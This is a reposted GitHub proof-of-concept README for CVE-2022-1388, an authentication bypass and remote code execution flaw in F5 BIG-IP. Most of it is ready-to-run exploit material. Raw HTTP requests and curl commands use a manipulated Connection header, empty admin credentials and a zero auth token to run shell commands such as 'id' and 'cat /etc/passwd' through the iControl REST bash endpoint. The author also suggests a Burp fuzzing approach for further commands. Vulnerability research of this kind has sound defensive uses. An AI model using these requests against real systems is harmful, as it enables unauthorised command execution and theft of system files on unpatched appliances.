alt3kx/CVE-2022-1388_PoC: F5 BIG-IP RCE exploitation (CVE-2022-1388)
2022-8-29 20:14:16 Author: github.com(查看原文) 阅读量:81 收藏

POST (1): poc_id

POST /mgmt/tm/util/bash HTTP/1.1
Host: <redacted>:8443
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: 0

{"command": "run" , "utilCmdArgs": " -c 'id' " }

curl commandliner:

$ curl -i -s -k -X $'POST' \
-H $'Host: <redacted>:8443' \
-H $'Authorization: Basic YWRtaW46' \
-H $'Connection: keep-alive, X-F5-Auth-Token' \
-H $'X-F5-Auth-Token: 0' \
-H $'Content-Length: 52' \
--data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \'id\' \" }\x0d\x0a' \
$'https://<redacted>:8443/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080

POST (2): poc_pass

POST /mgmt/tm/util/bash HTTP/1.1
Host: <redateced>:8443
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: 0

{"command": "run" , "utilCmdArgs": " -c ' cat /etc/passwd' " }

curl commandliner:

$ curl -i -s -k -X $'POST' \
-H $'Host: <redacted>:8443' \
-H $'Authorization: Basic YWRtaW46' -H $'Connection: keep-alive, X-F5-Auth-Token' \
-H $'X-F5-Auth-Token: 0' \
--data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \' cat /etc/passwd\' \" }\x0d\x0a\x0d\x0a' \
$'https://<redacted>/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080

Note:

Issue could be related between frontend and backend authentication "Jetty" with empty credentials "admin: <empty>" 
+ value of headers ,see "HTTP hop_by_hop request headers"...

My BIG-IP now fixed:

image

References and Fixes :

Here the documentation used latest nites:

HTTP hop_by_hop request headers:

F5 iControl REST Endpoint Authentication Bypass Technical Deep Dive by horizon3

My notes:

  • Updated with my icontrol endpoints and commands list used on my research (extracted from public documentation)
  • Could use Burp with "cluster bomb" or "Battering ram" (simple list) e.g

Payload1: icontrol_api_endpoints.txt
Payload2: icontrol_api_commands.txt

Alex Hernandez aka (@_alt3kx_)


文章来源: https://github.com/alt3kx/CVE-2022-1388_PoC
如有侵权请联系:admin#unsafe.sh